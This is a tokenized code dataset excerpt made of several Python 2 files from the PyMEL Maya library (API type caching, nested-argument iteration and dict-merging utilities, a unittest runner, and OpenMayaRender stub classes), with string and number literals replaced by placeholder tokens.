mayaType ) <EOL> if apiType is not None : <EOL> self . mayaTypesToApiTypes [ mayaType ] = apiType <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> if len ( unknownTypes ) > <NUM_LIT:0> : <EOL> _logger . warn ( "<STR_LIT>" % "<STR_LIT:U+002CU+0020>" . join ( unknownTypes ) ) <EOL> for mayaType , apiType in self . mayaTypesToApiTypes . iteritems ( ) : <EOL> self . addMayaType ( mayaType , apiType ) <EOL> def _buildApiTypesList ( self ) : <EOL> """<STR_LIT>""" <EOL> self . apiTypesToApiEnums = dict ( inspect . getmembers ( api . MFn , lambda x : type ( x ) is int ) ) <EOL> self . apiEnumsToApiTypes = dict ( ( self . apiTypesToApiEnums [ k ] , k ) for k in self . apiTypesToApiEnums . keys ( ) ) <EOL> def _buildMayaReservedTypes ( self , force = False ) : <EOL> """<STR_LIT>""" <EOL> if not force and ( getattr ( self , '<STR_LIT>' , None ) <EOL> and getattr ( self , '<STR_LIT>' , None ) ) : <EOL> return <EOL> invalidReservedTypes = { '<STR_LIT>' : '<STR_LIT>' , '<STR_LIT>' : '<STR_LIT>' } <EOL> self . reservedMayaTypes = dict ( ( item [ <NUM_LIT:0> ] , item [ <NUM_LIT:1> ] ) for item in filter ( lambda i : i [ <NUM_LIT:1> ] in self . apiTypesToApiEnums , self . RESERVED_TYPES . iteritems ( ) ) ) <EOL> self . reservedMayaTypes . update ( invalidReservedTypes ) <EOL> self . reservedApiTypes = dict ( ( item [ <NUM_LIT:1> ] , item [ <NUM_LIT:0> ] ) for item in self . reservedMayaTypes . iteritems ( ) ) <EOL> def _buildApiClassInfo ( self ) : <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> from pymel . internal . parsers import ApiDocParser <EOL> self . apiClassInfo = { } <EOL> parser = ApiDocParser ( api , enumClass = ApiEnum ) <EOL> for name , obj in inspect . getmembers ( api , lambda x : type ( x ) == type and x . __name__ . startswith ( '<STR_LIT:M>' ) ) : <EOL> if not name . startswith ( '<STR_LIT>' ) : <EOL> try : <EOL> info = parser . parse ( name ) <EOL> self . apiClassInfo [ name ] = info <EOL> except ( IOError , ValueError , IndexError ) , e : <EOL> _logger . warn ( "<STR_LIT>" % ( name , e ) ) <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> def _buildApiRelationships ( self ) : <EOL> """<STR_LIT>""" <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> def _MFnType ( x ) : <EOL> if x == api . MFnBase : <EOL> return self . apiEnumsToApiTypes [ <NUM_LIT:1> ] <EOL> else : <EOL> try : <EOL> return self . apiEnumsToApiTypes [ x ( ) . type ( ) ] <EOL> except : <EOL> return self . apiEnumsToApiTypes [ <NUM_LIT:0> ] <EOL> if not startup . mayaStartupHasRun ( ) : <EOL> startup . mayaInit ( ) <EOL> import maya . cmds <EOL> import pymel . api . plugins as plugins <EOL> import maya . mel <EOL> maya . mel . eval ( '<STR_LIT>' ) <EOL> plugins . loadAllMayaPlugins ( ) <EOL> mfnClasses = inspect . getmembers ( api , lambda x : inspect . isclass ( x ) and issubclass ( x , api . MFnBase ) ) <EOL> for name , mfnClass in mfnClasses : <EOL> current = _MFnType ( mfnClass ) <EOL> if not current : <EOL> _logger . warning ( "<STR_LIT>" % current ) <EOL> elif current == '<STR_LIT>' : <EOL> _logger . warning ( "<STR_LIT>" % current ) <EOL> else : <EOL> self . apiTypesToApiClasses [ current ] = mfnClass <EOL> self . _buildApiClassInfo ( ) <EOL> allMayaTypes = self . reservedMayaTypes . keys ( ) + maya . cmds . ls ( nodeTypes = True ) <EOL> self . _buildMayaToApiInfo ( allMayaTypes ) <EOL> _logger . debug ( "<STR_LIT>" ) <EOL> def addMayaType ( self , mayaType , apiType = None , updateObj = None ) : <EOL> """<STR_LIT>""" <EOL> if apiType is not '<STR_LIT>' : <EOL> apiEnum = getattr ( api . MFn , apiType ) <EOL> self . mayaTypesToApiTypes [ mayaType ] = apiType <EOL> self . mayaTypesToApiEnums [ mayaType ] = apiEnum <EOL> def removeMayaType ( self , mayaType , updateObj = None ) : <EOL> """<STR_LIT>""" <EOL> self . mayaTypesToApiEnums . pop ( mayaType , None ) <EOL> self . mayaTypesToApiTypes . pop ( mayaType , None ) <EOL> def build ( self ) : <EOL> """<STR_LIT>""" <EOL> super ( ApiCache , self ) . build ( ) <EOL> self . _buildMayaReservedTypes ( force = False ) <EOL> def read ( self , raw = False ) : <EOL> data = super ( ApiCache , self ) . read ( ) <EOL> if not raw : <EOL> if data is not None and len ( data ) != len ( self . _CACHE_NAMES ) : <EOL> if len ( data ) == <NUM_LIT:8> and versions . current ( ) < versions . v2012 : <EOL> data = data [ <NUM_LIT:2> : <NUM_LIT:6> ] + data [ <NUM_LIT:7> : ] <EOL> else : <EOL> data = None <EOL> return data <EOL> def rebuild ( self ) : <EOL> """<STR_LIT>""" <EOL> _logger . info ( "<STR_LIT>" ) <EOL> self . _buildApiTypesList ( ) <EOL> self . _buildMayaReservedTypes ( force = True ) <EOL> self . _buildApiRelationships ( ) <EOL> _logger . info ( '<STR_LIT>' ) <EOL> self . _mergeClassOverrides ( ) <EOL> def _mergeClassOverrides ( self , bridgeCache = None ) : <EOL> if bridgeCache is None : <EOL> bridgeCache = ApiMelBridgeCache ( ) <EOL> bridgeCache . build ( ) <EOL> _util . mergeCascadingDicts ( bridgeCache . apiClassOverrides , self . apiClassInfo , allowDictToListMerging = True ) <EOL> def melBridgeContents ( self ) : <EOL> return self . _mayaApiMelBridge . contents ( ) <EOL> def extraDicts ( self ) : <EOL> return tuple ( getattr ( self , x ) for x in self . EXTRA_GLOBAL_NAMES ) </s>
<s> """<STR_LIT>""" <EOL> from collections import deque as _deque <EOL> import sys , operator , itertools <EOL> from utilitytypes import ProxyUnicode <EOL> def isIterable ( obj ) : <EOL> """<STR_LIT>""" <EOL> if isinstance ( obj , basestring ) : return False <EOL> elif isinstance ( obj , ProxyUnicode ) : return False <EOL> try : <EOL> iter ( obj ) <EOL> except TypeError : return False <EOL> else : return True <EOL> def isScalar ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isNumberType ( obj ) and not isinstance ( obj , complex ) <EOL> def isNumeric ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isNumberType ( obj ) <EOL> def isSequence ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isSequenceType ( obj ) <EOL> def isMapping ( obj ) : <EOL> """<STR_LIT>""" <EOL> return operator . isMappingType ( obj ) <EOL> clsname = lambda x : type ( x ) . __name__ <EOL> def convertListArgs ( args ) : <EOL> if len ( args ) == <NUM_LIT:1> and isIterable ( args [ <NUM_LIT:0> ] ) : <EOL> return tuple ( args [ <NUM_LIT:0> ] ) <EOL> return args <EOL> def expandArgs ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tpe = kwargs . get ( '<STR_LIT:type>' , '<STR_LIT:all>' ) <EOL> limit = kwargs . get ( '<STR_LIT>' , sys . getrecursionlimit ( ) ) <EOL> postorder = kwargs . get ( '<STR_LIT>' , False ) <EOL> breadth = kwargs . get ( '<STR_LIT>' , False ) <EOL> if tpe == '<STR_LIT:list>' or tpe == list : <EOL> def _expandArgsTest ( arg ) : return type ( arg ) == list <EOL> elif tpe == '<STR_LIT:all>' : <EOL> def _expandArgsTest ( arg ) : return isIterable ( arg ) <EOL> else : <EOL> raise ValueError , "<STR_LIT>" % str ( tpe ) <EOL> if postorder : <EOL> return postorderArgs ( limit , _expandArgsTest , * args ) <EOL> elif breadth : <EOL> return breadthArgs ( limit , _expandArgsTest , * args ) <EOL> else : <EOL> return preorderArgs ( limit , _expandArgsTest , * args ) <EOL> def preorderArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> stack = [ ( x , <NUM_LIT:0> ) for x in args ] <EOL> result = _deque ( ) <EOL> while stack : <EOL> arg , level = stack . pop ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> stack += [ ( x , level + <NUM_LIT:1> ) for x in arg ] <EOL> else : <EOL> result . appendleft ( arg ) <EOL> return tuple ( result ) <EOL> def postorderArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> if len ( args ) == <NUM_LIT:1> : <EOL> return ( args [ <NUM_LIT:0> ] , ) <EOL> else : <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in args ) <EOL> stack = [ ] <EOL> result = [ ] <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> deq = _deque ( [ ( x , level + <NUM_LIT:1> ) for x in arg ] + list ( deq ) ) <EOL> else : <EOL> if stack : <EOL> while stack and level <= stack [ - <NUM_LIT:1> ] [ <NUM_LIT:1> ] : <EOL> result . append ( stack . pop ( ) [ <NUM_LIT:0> ] ) <EOL> stack . append ( ( arg , level ) ) <EOL> else : <EOL> stack . append ( ( arg , level ) ) <EOL> while stack : <EOL> result . append ( stack . pop ( ) [ <NUM_LIT:0> ] ) <EOL> return tuple ( result ) <EOL> def breadthArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in args ) <EOL> result = [ ] <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> for a in arg : <EOL> deq . append ( ( a , level + <NUM_LIT:1> ) ) <EOL> else : <EOL> result . append ( arg ) <EOL> return tuple ( result ) <EOL> def iterateArgs ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> tpe = kwargs . get ( '<STR_LIT:type>' , '<STR_LIT:all>' ) <EOL> limit = kwargs . get ( '<STR_LIT>' , sys . getrecursionlimit ( ) ) <EOL> postorder = kwargs . get ( '<STR_LIT>' , False ) <EOL> breadth = kwargs . get ( '<STR_LIT>' , False ) <EOL> if tpe == '<STR_LIT:list>' or tpe == list : <EOL> def _iterateArgsTest ( arg ) : return type ( arg ) == list <EOL> elif tpe == '<STR_LIT:all>' : <EOL> def _iterateArgsTest ( arg ) : return isIterable ( arg ) <EOL> else : <EOL> raise ValueError , "<STR_LIT>" % str ( tpe ) <EOL> if postorder : <EOL> for arg in postorderIterArgs ( limit , _iterateArgsTest , * args ) : <EOL> yield arg <EOL> elif breadth : <EOL> for arg in breadthIterArgs ( limit , _iterateArgsTest , * args ) : <EOL> yield arg <EOL> else : <EOL> for arg in preorderIterArgs ( limit , _iterateArgsTest , * args ) : <EOL> yield arg <EOL> def preorderIterArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> for arg in args : <EOL> if testFn ( arg ) : <EOL> for a in preorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> yield arg <EOL> else : <EOL> for arg in args : <EOL> yield arg <EOL> def postorderIterArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> last = None <EOL> for arg in args : <EOL> if testFn ( arg ) : <EOL> for a in postorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> if last : <EOL> yield last <EOL> last = arg <EOL> if last : <EOL> yield last <EOL> else : <EOL> for arg in args : <EOL> yield arg <EOL> def breadthIterArgs ( limit = sys . getrecursionlimit ( ) , testFn = isIterable , * args ) : <EOL> """<STR_LIT>""" <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in args ) <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> for a in arg : <EOL> deq . append ( ( a , level + <NUM_LIT:1> ) ) <EOL> else : <EOL> yield arg <EOL> def preorder ( iterable , testFn = isIterable , limit = sys . getrecursionlimit ( ) ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> for arg in iterable : <EOL> if testFn ( arg ) : <EOL> for a in preorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> yield arg <EOL> else : <EOL> for arg in iterable : <EOL> yield arg <EOL> def postorder ( iterable , testFn = isIterable , limit = sys . getrecursionlimit ( ) ) : <EOL> """<STR_LIT>""" <EOL> if limit : <EOL> last = None <EOL> for arg in iterable : <EOL> if testFn ( arg ) : <EOL> for a in postorderIterArgs ( limit - <NUM_LIT:1> , testFn , * arg ) : <EOL> yield a <EOL> else : <EOL> if last : <EOL> yield last <EOL> last = arg <EOL> if last : <EOL> yield last <EOL> else : <EOL> for arg in iterable : <EOL> yield arg <EOL> def breadth ( iterable , testFn = isIterable , limit = sys . getrecursionlimit ( ) ) : <EOL> """<STR_LIT>""" <EOL> deq = _deque ( ( x , <NUM_LIT:0> ) for x in iterable ) <EOL> while deq : <EOL> arg , level = deq . popleft ( ) <EOL> if testFn ( arg ) and level < limit : <EOL> for a in arg : <EOL> deq . append ( ( a , level + <NUM_LIT:1> ) ) <EOL> else : <EOL> yield arg <EOL> def listForNone ( res ) : <EOL> "<STR_LIT>" <EOL> if res is None : <EOL> return [ ] <EOL> return res <EOL> def pairIter ( sequence ) : <EOL> '''<STR_LIT>''' <EOL> theIter = iter ( sequence ) <EOL> return itertools . izip ( theIter , theIter ) <EOL> def reorder ( x , indexList = [ ] , indexDict = { } ) : <EOL> """<STR_LIT>""" <EOL> x = list ( x ) <EOL> num = len ( x ) <EOL> popCount = <NUM_LIT:0> <EOL> indexValDict = { } <EOL> for i , index in enumerate ( indexList ) : <EOL> if index is not None : <EOL> val = x . pop ( index - popCount ) <EOL> assert index not in indexDict , indexDict <EOL> indexValDict [ i ] = val <EOL> popCount += <NUM_LIT:1> <EOL> for k , v in indexDict . items ( ) : <EOL> indexValDict [ v ] = x . pop ( k - popCount ) <EOL> popCount += <NUM_LIT:1> <EOL> newlist = [ ] <EOL> for i in range ( num ) : <EOL> try : <EOL> val = indexValDict [ i ] <EOL> except KeyError : <EOL> val = x . pop ( <NUM_LIT:0> ) <EOL> newlist . append ( val ) <EOL> return newlist <EOL> class RemovedKey ( object ) : <EOL> def __init__ ( self , oldVal ) : <EOL> self . oldVal = oldVal <EOL> def __eq__ ( self , other ) : <EOL> return self . oldVal == other . oldVal <EOL> def __ne__ ( self , other ) : <EOL> return self . oldVal != other . oldVal <EOL> def compareCascadingDicts ( dict1 , dict2 ) : <EOL> '''<STR_LIT>''' <EOL> if isinstance ( dict1 , ( list , tuple ) ) : <EOL> dict1 = dict ( enumerate ( dict1 ) ) <EOL> if isinstance ( dict2 , ( list , tuple ) ) : <EOL> dict2 = dict ( enumerate ( dict2 ) ) <EOL> v1 = set ( dict1 ) <EOL> v2 = set ( dict2 ) <EOL> both = v1 & v2 <EOL> only1 = v1 - both <EOL> only2 = v2 - both <EOL> recurseTypes = ( dict , list , tuple ) <EOL> differences = dict ( ( key , dict2 [ key ] ) for key in only2 ) <EOL> differences . update ( ( key , RemovedKey ( dict1 [ key ] ) ) for key in only1 ) <EOL> for key in both : <EOL> val1 = dict1 [ key ] <EOL> val2 = dict2 [ key ] <EOL> if val1 != val2 : <EOL> if isinstance ( val1 , recurseTypes ) and isinstance ( val2 , recurseTypes ) : <EOL> subDiffs = compareCascadingDicts ( val1 , val2 ) [ - <NUM_LIT:1> ] <EOL> differences [ key ] = subDiffs <EOL> else : <EOL> differences [ key ] = val2 <EOL> return both , only1 , only2 , differences <EOL> def mergeCascadingDicts ( from_dict , to_dict , allowDictToListMerging = False , <EOL> allowNewListMembers = False ) : <EOL> """<STR_LIT>""" <EOL> listMerge = allowDictToListMerging and isinstance ( to_dict , list ) <EOL> if listMerge : <EOL> contains = lambda key : isinstance ( key , int ) and <NUM_LIT:0> <= key < len ( to_dict ) <EOL> else : <EOL> contains = lambda key : key in to_dict <EOL> for key , from_val in from_dict . iteritems ( ) : <EOL> if contains ( key ) : <EOL> if isinstance ( from_val , RemovedKey ) : <EOL> del to_dict [ key ] <EOL> continue <EOL> to_val = to_dict [ key ] <EOL> if hasattr ( from_val , '<STR_LIT>' ) and ( hasattr ( to_val , '<STR_LIT>' ) <EOL> or ( allowDictToListMerging and isinstance ( to_val , list ) ) ) : <EOL> mergeCascadingDicts ( from_val , to_val , allowDictToListMerging ) <EOL> else : <EOL> to_dict [ key ] = from_val <EOL> else : <EOL> if isinstance ( from_val , RemovedKey ) : <EOL> continue <EOL> if listMerge and allowNewListMembers and key >= len ( to_dict ) : <EOL> to_dict . extend ( ( None , ) * ( key + <NUM_LIT:1> - len ( to_dict ) ) ) <EOL> to_dict [ key ] = from_val <EOL> def setCascadingDictItem ( dict , keys , value ) : <EOL> currentDict = dict <EOL> for key in keys [ : - <NUM_LIT:1> ] : <EOL> if key not in currentDict : <EOL> currentDict [ key ] = { } <EOL> currentDict = currentDict [ key ] <EOL> currentDict [ keys [ - <NUM_LIT:1> ] ] = value <EOL> def getCascadingDictItem ( dict , keys , default = { } ) : <EOL> currentDict = dict <EOL> for key in keys [ : - <NUM_LIT:1> ] : <EOL> if isMapping ( currentDict ) and key not in currentDict : <EOL> currentDict [ key ] = { } <EOL> currentDict = currentDict [ key ] <EOL> try : <EOL> return currentDict [ keys [ - <NUM_LIT:1> ] ] <EOL> except KeyError : <EOL> return default <EOL> def sequenceToSlices ( intList , sort = True ) : <EOL> """<STR_LIT>""" <EOL> slices = [ ] <EOL> if intList : <EOL> if sort : <EOL> intList = sorted ( intList ) <EOL> start = intList [ <NUM_LIT:0> ] <EOL> stop = None <EOL> step = None <EOL> lastStep = None <EOL> lastVal = start <EOL> for curr in intList [ <NUM_LIT:1> : ] : <EOL> curr = int ( curr ) <EOL> thisStep = curr - lastVal <EOL> if lastStep is None : <EOL> pass <EOL> elif thisStep > <NUM_LIT:0> and thisStep == lastStep : <EOL> step = thisStep <EOL> else : <EOL> if step is not None : <EOL> if step == <NUM_LIT:1> : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , None ) <EOL> else : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , step ) <EOL> thisStep = None <EOL> start = curr <EOL> else : <EOL> if lastStep == <NUM_LIT:1> : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , lastStep ) <EOL> thisStep = None <EOL> start = curr <EOL> else : <EOL> newslice = slice ( start , stop + <NUM_LIT:1> ) <EOL> start = lastVal <EOL> slices . append ( newslice ) <EOL> stop = None <EOL> step = None <EOL> lastStep = thisStep <EOL> stop = lastVal <EOL> lastVal = curr <EOL> if step is not None : <EOL> if step == <NUM_LIT:1> : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , None ) <EOL> else : <EOL> newslice = slice ( start , lastVal + <NUM_LIT:1> , step ) <EOL> slices . append ( newslice ) <EOL> else : <EOL> if lastStep == <NUM_LIT:1> : <EOL> slices . append ( slice ( start , lastVal + <NUM_LIT:1> , lastStep ) ) <EOL> else : <EOL> slices . append ( slice ( start , start + <NUM_LIT:1> ) ) <EOL> if lastStep is not None : <EOL> slices . append ( slice ( lastVal , lastVal + <NUM_LIT:1> ) ) <EOL> return slices <EOL> def izip_longest ( * args , ** kwds ) : <EOL> fillvalue = kwds . get ( '<STR_LIT>' ) <EOL> def sentinel ( counter = ( [ fillvalue ] * ( len ( args ) - <NUM_LIT:1> ) ) . pop ) : <EOL> yield counter ( ) <EOL> fillers = itertools . repeat ( fillvalue ) <EOL> iters = [ itertools . chain ( it , sentinel ( ) , fillers ) for it in args ] <EOL> try : <EOL> for tup in itertools . izip ( * iters ) : <EOL> yield tup <EOL> except IndexError : <EOL> pass </s>
<s> import unittest <EOL> import os <EOL> """<STR_LIT>""" <EOL> import sys <EOL> import inspect <EOL> gCantRun = False <EOL> try : <EOL> import nose <EOL> except ImportError : <EOL> gCantRun = True <EOL> print ( '<STR_LIT>' ) <EOL> if not gCantRun : <EOL> thisDir = os . path . dirname ( inspect . getsourcefile ( lambda : None ) ) <EOL> try : <EOL> import pymel_test <EOL> except ImportError : <EOL> sys . path . append ( thisDir ) <EOL> try : <EOL> import pymel_test <EOL> except ImportError : <EOL> gCantRun = True <EOL> import traceback <EOL> print ( '<STR_LIT>' ) <EOL> traceback . print_exc ( ) <EOL> if not gCantRun : <EOL> class TestPymel ( unittest . TestCase ) : <EOL> pymelDir = os . path . dirname ( thisDir ) <EOL> def testPymel ( self ) : <EOL> pymel_test . nose_test ( pymelDir = self . pymelDir ) <EOL> if __name__ == '<STR_LIT:__main__>' : <EOL> suite = unittest . TestLoader ( ) . loadTestsFromTestCase ( TestPymel ) <EOL> unittest . TextTestRunner ( verbosity = <NUM_LIT:2> ) . run ( suite ) </s>
<s> import _OpenMayaRender <EOL> import weakref <EOL> from . import OpenMaya <EOL> from __builtin__ import object as _object <EOL> from __builtin__ import property as _swig_property <EOL> class MRenderData ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def screenToWorld ( * args , ** kwargs ) : <EOL> pass <EOL> def worldToScreen ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> aspectRatio = None <EOL> bottom = None <EOL> bytesPerChannel = None <EOL> depthArr = None <EOL> eyePoint = None <EOL> fieldOfView = None <EOL> internalData = None <EOL> left = None <EOL> perspective = None <EOL> resX = None <EOL> resY = None <EOL> rgbaArr = None <EOL> right = None <EOL> thisown = None <EOL> top = None <EOL> viewDirection = None <EOL> worldToEyeMatrix = None <EOL> xsize = None <EOL> ysize = None <EOL> __swig_destroy__ = None <EOL> class MRenderUtil ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def className ( * args , ** kwargs ) : <EOL> pass <EOL> def convertPsdFile ( * args , ** kwargs ) : <EOL> pass <EOL> def diffuseReflectance ( * args , ** kwargs ) : <EOL> pass <EOL> def eval2dTexture ( * args , ** kwargs ) : <EOL> pass <EOL> def exactFileTextureName ( * args , ** kwargs ) : <EOL> pass <EOL> def exactImagePlaneFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def generatingIprFile ( * args , ** kwargs ) : <EOL> pass <EOL> def getCommonRenderSettings ( * args , ** kwargs ) : <EOL> pass <EOL> def hemisphereCoverage ( * args , ** kwargs ) : <EOL> pass <EOL> def inCurrentRenderLayer ( * args , ** kwargs ) : <EOL> pass <EOL> def lightAttenuation ( * args , ** kwargs ) : <EOL> pass <EOL> def mainBeautyPassCustomTokenString ( * args , ** kwargs ) : <EOL> pass <EOL> def mainBeautyPassName ( * args , ** kwargs ) : <EOL> pass <EOL> def maximumSpecularReflection ( * args , ** kwargs ) : <EOL> pass <EOL> def mayaRenderState ( * args , ** kwargs ) : <EOL> pass <EOL> def raytrace ( * args , ** kwargs ) : <EOL> pass <EOL> def raytraceFirstGeometryIntersections ( * args , ** kwargs ) : <EOL> pass <EOL> def relativeFileName ( * args , ** kwargs ) : <EOL> pass <EOL> def renderObjectItem ( * args , ** kwargs ) : <EOL> pass <EOL> def renderPass ( * args , ** kwargs ) : <EOL> pass <EOL> def sampleShadingNetwork ( * args , ** kwargs ) : <EOL> pass <EOL> def sendRenderProgressInfo ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kAll = <NUM_LIT:0> <EOL> kAmbientOnly = <NUM_LIT:3> <EOL> kBatchRender = <NUM_LIT:1> <EOL> kColorOnly = <NUM_LIT:1> <EOL> kDiffuseOnly = <NUM_LIT:4> <EOL> kHardwareRender = <NUM_LIT:4> <EOL> kInteractiveRender = <NUM_LIT:2> <EOL> kIprRender = <NUM_LIT:3> <EOL> kNotRendering = <NUM_LIT:0> <EOL> kShadowOnly = <NUM_LIT:2> <EOL> kSpecularOnly = <NUM_LIT:5> <EOL> class MD3D9Renderer ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def getD3D9Device ( * args , ** kwargs ) : <EOL> pass <EOL> def makeSwatchContextCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def readSwatchContextPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def setBackgroundColor ( * args , ** kwargs ) : <EOL> pass <EOL> def theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class RV_AOV ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> name = None <EOL> numberOfChannels = None <EOL> pPixels = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class new_instancemethod ( _object ) : <EOL> """<STR_LIT>""" <EOL> def __call__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __cmp__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __delattr__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __get__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __getattribute__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __hash__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __repr__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> def __setattr__ ( * args , ** kwargs ) : <EOL> """<STR_LIT>""" <EOL> pass <EOL> __func__ = None <EOL> __self__ = None <EOL> im_class = None <EOL> im_func = None <EOL> im_self = None <EOL> __new__ = None <EOL> class MGeometry ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def assign ( * args , ** kwargs ) : <EOL> pass <EOL> def binormal ( * args , ** kwargs ) : <EOL> pass <EOL> def color ( * args , ** kwargs ) : <EOL> pass <EOL> def componentId ( * args , ** kwargs ) : <EOL> pass <EOL> def data ( * args , ** kwargs ) : <EOL> pass <EOL> def normal ( * args , ** kwargs ) : <EOL> pass <EOL> def position ( * args , ** kwargs ) : <EOL> pass <EOL> def primitiveArray ( * args , ** kwargs ) : <EOL> pass <EOL> def primitiveArrayCount ( * args , ** kwargs ) : <EOL> pass <EOL> def tangent ( * args , ** kwargs ) : <EOL> pass <EOL> def texCoord ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> __swig_destroy__ = None <EOL> class MHardwareRenderer ( _object ) : <EOL> def __init__ ( self , * args , ** kwargs ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def addDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def backEndString ( * args , ** kwargs ) : <EOL> pass <EOL> def dereferenceGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def drawSwatchBackGroundQuads ( * args , ** kwargs ) : <EOL> pass <EOL> def findDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def getBufferSize ( * args , ** kwargs ) : <EOL> pass <EOL> def getColorBufferPixelFormat ( * args , ** kwargs ) : <EOL> pass <EOL> def getCurrentExposureNumber ( * args , ** kwargs ) : <EOL> pass <EOL> def getDepthBufferPixelFormat ( * args , ** kwargs ) : <EOL> pass <EOL> def getDrawProcedureCount ( * args , ** kwargs ) : <EOL> pass <EOL> def getDrawProcedureListNames ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchLightDirection ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchOrthoCameraSetting ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchPerspectiveCameraSetting ( * args , ** kwargs ) : <EOL> pass <EOL> def getSwatchPerspectiveCameraTranslation ( * args , ** kwargs ) : <EOL> pass <EOL> def getTotalExposureCount ( * args , ** kwargs ) : <EOL> pass <EOL> def glFunctionTable ( * args , ** kwargs ) : <EOL> pass <EOL> def insertDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def makeResourceContextCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def makeSwatchContextCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def readSwatchContextPixels ( * args , ** kwargs ) : <EOL> pass <EOL> def referenceDefaultGeometry ( * args , ** kwargs ) : <EOL> pass <EOL> def removeDrawProcedure ( * args , ** kwargs ) : <EOL> pass <EOL> def restoreCurrent ( * args , ** kwargs ) : <EOL> pass <EOL> def theRenderer ( * args , ** kwargs ) : <EOL> pass <EOL> __dict__ = None <EOL> __weakref__ = None <EOL> thisown = None <EOL> kDefaultCube = <NUM_LIT:2> <EOL> kDefaultPlane = <NUM_LIT:1> <EOL> kDefaultSphere = <NUM_LIT:0> <EOL> kDepth_Float32 = <NUM_LIT:2> <EOL> kFailure = <NUM_LIT:1> <EOL> kItemExists = <NUM_LIT:2> <EOL> kItemNotFound = <NUM_LIT:3> <EOL> kLocationNotFound = <NUM_LIT:4> <EOL> kPostExposure = <NUM_LIT:2> <EOL> kPostRendering = <NUM_LIT:3> <EOL> kPreExposure = <NUM_LIT:1> <EOL> kPreRendering = <NUM_LIT:0> <EOL> kRGBA_Fix8 = <NUM_LIT:0> <EOL> kRGBA_Float16 = <NUM_LIT:1> <EOL> kSuccess = <NUM_LIT:0> <EOL> class MSwatchRenderBase ( _object ) : <EOL> def __init__ ( self , * args ) : <EOL> pass <EOL> def __repr__ ( self ) : <EOL> pass <EOL> def doIteration ( * args , ** kwargs ) : <EOL> pass <EOL> def image ( * args , ** kwargs ) : <EOL> pass <EOL> def node ( * args , ** kwargs ) : <EOL> 